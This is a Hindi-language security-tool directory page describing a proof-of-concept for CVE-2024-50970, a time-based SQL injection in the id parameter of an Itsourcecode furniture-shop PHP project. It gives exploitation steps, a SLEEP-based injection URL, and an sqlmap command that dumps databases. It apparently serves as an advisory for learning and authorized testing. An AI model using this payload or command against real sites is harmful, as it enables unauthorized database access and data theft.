Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/akhlak2511/cve-2024-50970
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाडेटाबेस सुरक्षा
GitHubakhlak2511/cve-2024-50970

CVE-2024-50970

प्रूफ-ऑफ-कॉन्सेप्ट जो Itsourcecode Online Furniture Shopping Project 1.0 में orderview1.php फ़ाइल के id पैरामीटर के माध्यम से समय-आधारित SQL इंजेक्शन प्रदर्शित करता है, जिसमें शोषण के चरण और SQLMap कमांड शामिल हैं।

रिपॉजिटरी देखें
171 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-50970

विवरण

Itsourcecode Online Furniture Shopping Project 1.0 के orderview1.php में एक SQL इंजेक्शन भेद्यता रिमोट हमलावरों को id पैरामीटर के माध्यम से मनमानी SQL कमांड निष्पादित करने की अनुमति देती है।

भेद्यता प्रकार

SQL इंजेक्शन

उत्पाद विक्रेता

Itsourcecode

प्रभावित उत्पाद कोड बेस:

https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/ - 1.0

प्रभावित घटक:

Itsourcecode Online Furniture Shopping v1.0 orderview1.php पेज में id पैरामीटर के माध्यम से SQL इंजेक्शन के लिए असुरक्षित है।

हमले के वेक्टर:

  1. एप्लिकेशन को स्थानीय रूप से सेट करें, एक खाता पंजीकृत करें, और नए पंजीकृत खाते से लॉग इन करें।
  2. अपने ब्राउज़र में निम्नलिखित URL पर जाएँ: http://localhost/nikos/orderview1.php?action=edit&id=1728835149
  3. SQL पेलोड इंजेक्ट करें: URL में id पैरामीटर को संशोधित करके समय-आधारित SQL इंजेक्शन पेलोड शामिल करें। http://localhost/nikos/orderview1.php?action=edit&id=1728835149+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))DTmU)
  4. एप्लिकेशन प्रतिक्रिया देखें: यदि इंजेक्शन सफल होता है तो पेज को लोड होने में काफी अधिक समय (10 सेकंड) लगना चाहिए, जो पुष्टि करता है कि id पैरामीटर SQL इंजेक्शन के लिए असुरक्षित है।
  5. अब SQLMap टूल का उपयोग करके आगे शोषण और डेटाबेस डंपिंग के लिए नीचे दिए गए कमांड का उपयोग करें: python sqlmap.py -u "http://localhost/nikos/orderview1.php?action=edit&id=1728835149" --cookie="PHPSESSID=your_cookie_here"--risk 3 --level 3 --dbs --technique=T --dump --no-cast

संदर्भ:

  1. https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/
  2. https://owasp.org/www-community/attacks/SQL_Injection
टूल डाउनलोड करें